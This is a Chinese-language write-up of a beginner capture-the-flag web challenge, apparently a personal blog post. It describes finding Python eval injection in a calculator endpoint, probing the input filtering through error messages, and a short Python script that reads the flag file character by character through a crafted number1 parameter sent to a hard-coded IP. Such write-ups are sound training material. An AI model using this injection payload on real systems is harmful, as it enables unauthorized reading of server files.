萌新赛-数学及格了

>

>

萌新赛-数学及格了

yuchoxuuan

点开，是个计算器，
于是f12以下，看看是纯js还是有后台的，如果是纯js我就放弃了，因为我有js恐惧症
点1+1= 发现有流量

地址是酱紫的

于是开始愉快的玩耍
比如有枣没枣打一竿子的'
然后发现报错了，而且是python的。。。

eval。。感觉有搞头，不知道他前面过滤的咋样，经尝试，a,b首位必须是数字。。。其他很宽松
于是我试了试有没有读文件的权限。
因为前后左右都是数字，所以试验了一下得到的报错是 没有这个文件
这证明。。。其实是有读文件权限的。

从报错里面找到当前文件夹
然后再试一下，不行就要想办法import os了


卧槽，居然成功了。。。
然后就把这20个字符读出来就好了呀
屡一下啊 这个pl可以总结为
?number1=1*（我回头构造的数字）
&operator=%2B (+)
&number2=0

然后上代码

def get(url=''): return requests.get(url).text
for i in range(20):
    url = 'http://124.156.121.112:5000/_calculate?number1=1*ord(open("/home/ctf/web/flag").read()[%d])&operator=%%2B&number2=0'%i
    c = get(url).replace('{','').replace('"result":','').replace('}','').replace(' ','').replace('\n','')
    print(chr(int(c)),end='')

群主的爱好昭然若揭。